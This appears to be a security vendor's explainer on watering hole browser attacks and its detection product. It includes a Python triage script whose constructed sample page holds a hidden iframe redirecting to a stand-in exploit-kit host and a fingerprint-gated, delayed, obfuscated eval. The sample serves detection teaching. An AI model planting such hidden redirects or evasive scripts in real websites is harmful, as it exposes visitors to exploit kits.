Browser attacks
Browser attacks, also called "watering hole attacks", are currently the most insidious and stealthy cyber attacks. Instead of
sending the victim an e-mail or social media message containing a link, the attackers compromise a vulnerable legitimate
website the victim regularly visits and implant code that eventually takes full control of the victim's device, through
vulnerabilities either in the browser itself or in underlying technologies such as Java or Flash. This makes the attack very
hard to spot and acknowledge because, as opposed to the much more common spearphishing attacks, there is no direct link
between the attack and the user's behavior.
Browser attacks focus on traditional browsers such as Chrome, Edge or Firefox, but they also target mobile devices, which makes
them even harder to identify. Most of the vulnerabilities used in watering hole attacks are either very new or unknown at the
time of the attack. After a successful attack, the attackers either implant a rootkit or use the victim's device to mine
cryptocurrency.
A browser attack usually implants an iframe element in a legitimate website, which redirects the victim to an exploit kit
server, where the actual attack is performed.
The problem
The HTTP/S and HTML standards have different implementations in different browsers, mainly because HTTP was standardized as a
protocol years after browsers emerged, allowing browser engines to have their own implementation and interpretation of these
standards.
With the introduction of JavaScript, web pages began to act dynamically instead of serving static content. This means that the
final form of a website is only known once all the JavaScript has executed in the user's browser context. It also means that
security products need to know exactly how the user's browser interprets and executes the JavaScript on the pages it loads.
Traditional antivirus products and intrusion detection sensors use signature scanning to identify watering hole attacks,
looking for known code snippets involved in these attacks. But in recent years, watering hole attacks have evolved to use
JavaScript obfuscation to hide the relevant code snippets, making it impossible for traditional security products to detect
such attacks.
To counter this, traditional security products try to detect the signature of the actual exploit, or the aftermath of the
attack, such as the connection to the command and control server. But if the exploit is unknown or very new, there is no
signature for it, and if the command and control traffic doesn't look suspicious, for instance because it is a DNS request or
an HTTPS connection, the attack goes totally undetected.
So the only remaining solution seems to be client-side honeypots, which emulate browsers and visit websites hoping to find
watering hole attacks. But this approach is very time consuming, as modern websites can have hundreds or thousands of pages,
and loading each and every one of them in an instrumented environment takes time. Also, attackers have developed a series of
methods to identify instrumented environments, ranging from delayed execution to detection of virtualized environments, which
are specific to client-side honeypots. On top of that, attackers fingerprint the browser and only attack certain browsers,
certain technologies, or users from a certain geographical area or IP range.
If the client-side honeypot doesn't guess all of the above correctly, the attack never happens, so the security product fails
to identify the offensive web page.
Do watering hole attacks actually happen?
These features of watering hole attacks made them the perfect candidate for penetrating the highly secured networks of banks,
the defense industry or government contractors, tech giants such as Facebook, Apple, Twitter or Microsoft, but also activist
groups, investigative journalists or political dissidents all over the world.
Most of the time the victims realize they have been compromised only after a very long period, sometimes years, sometimes
never, and when they do realize the attack happened, it is usually due to luck or coincidence.
Dekeneas APT Hunter
Dekeneas APT Hunter uses artificial intelligence to understand the contents of a web page before performing further dynamic
instrumentation, looking for features such as obfuscation, delayed execution, redirection or fingerprinting. If an HTML element
shows signs of suspicious behavior, it is instrumented in a series of sandboxes that emulate user behavior according to the
features identified. For instance, if the HTML element tries to identify certain browsers, those browsers are emulated.
Likewise, if the HTML element checks whether the user has a certain language, the emulated browser sets that particular
language.
This greatly reduces the time needed for analysis, as only suspicious HTML elements are analyzed, and it also greatly
increases the chances of detection by creating the exact environment the suspicious HTML element is looking for.
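As an added illustration of the static pre-filtering step described above (example code written for this page, not Dekeneas APT Hunter's own implementation), the following Python script scores a constructed HTML fragment for the features the text names, including the hidden iframe redirect described in the first section, and recovers which browser and language the script fingerprints for so a sandbox could present exactly those. The sample pages, the regexes and the two-feature threshold are all assumptions made for the example.

```python
import re

# Constructed sample (not from a real site): a legitimate page with an injected
# hidden iframe and a script that fingerprints the browser, waits, then decodes
# an obfuscated payload. The iframe is the redirect to the exploit kit server.
SAMPLE_HTML = """<html><body><h1>Local news</h1>
<iframe src="http://exploit-kit.example/gate.php" width="1" height="1" style="display:none"></iframe>
<script>
if (navigator.userAgent.indexOf("Firefox") > -1 && navigator.language == "en-US") {
  setTimeout(function(){ eval(unescape("%64%6f%63%75%6d%65%6e%74")); }, 60000);
}
</script></body></html>"""

# Constructed benign fragment: dynamic, but none of the suspicious features.
BENIGN_HTML = '<html><body><script>document.getElementById("x").innerText = "hi";</script></body></html>'

# One heuristic regex per feature named in the text; an illustration, not a complete rule set.
FEATURES = {
    "hidden_iframe": re.compile(
        r'<iframe[^>]*(?:(?:width|height)=["\']?[01]["\']?(?=[\s/>])|display:\s*none|visibility:\s*hidden)[^>]*>', re.I),
    "obfuscation": re.compile(r'\b(?:eval|unescape|String\.fromCharCode|atob)\s*\(', re.I),
    "delayed_execution": re.compile(r'setTimeout\s*\(.*?,\s*(\d{4,})\s*\)', re.I | re.S),
    "redirection": re.compile(r'(?:location\.(?:href|replace)|window\.location)\s*[=(]', re.I),
    "fingerprinting": re.compile(r'navigator\.(?:userAgent|language|platform|plugins)', re.I),
}

def extract_features(html):
    """Return the set of suspicious feature names present in an HTML/JS fragment."""
    return {name for name, rx in FEATURES.items() if rx.search(html)}

def emulation_hints(html):
    """Recover the browser and locale the script checks for, so a sandbox can present them."""
    hints = {}
    m = re.search(r'userAgent[^;]*?["\'](\w+)["\']', html)
    if m:
        hints["browser"] = m.group(1)
    m = re.search(r'navigator\.language\s*==+\s*["\']([\w-]+)["\']', html)
    if m:
        hints["language"] = m.group(1)
    return hints

def triage(html, min_features=2):
    """Static pre-filter: only fragments with at least min_features go on to dynamic instrumentation."""
    feats = extract_features(html)
    return {"suspicious": len(feats) >= min_features,
            "features": sorted(feats),
            "emulate": emulation_hints(html) if feats else {}}

if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
    print(triage(BENIGN_HTML))
```

The returned "emulate" hints are what a sandbox would apply (user agent string and accepted language) before loading the fragment dynamically; pages scoring below the threshold are skipped, which is the time saving the text describes.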
These unique features have allowed Dekeneas APT Hunter to uncover a series of complex attacks carried out by APT groups, but
also by cybercriminals, all of them using either very new or unknown exploitation vectors.